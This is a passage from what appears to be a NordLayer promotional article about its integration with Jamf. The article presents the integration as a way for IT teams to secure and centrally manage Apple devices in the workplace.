  • Ensure compliance with security policies using Jamf’s management tools

For more information on how to integrate Jamf and NordLayer, please check our mini-guide.

How NordLayer can help

A strong, scalable security strategy is essential for modern businesses, especially with the growing number of Apple devices in the workplace. The NordLayer & Jamf integration makes security simple, giving IT teams full control while keeping users productive. With easy deployment, automated updates, and centralized management, businesses can protect company resources without disrupting workflows.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.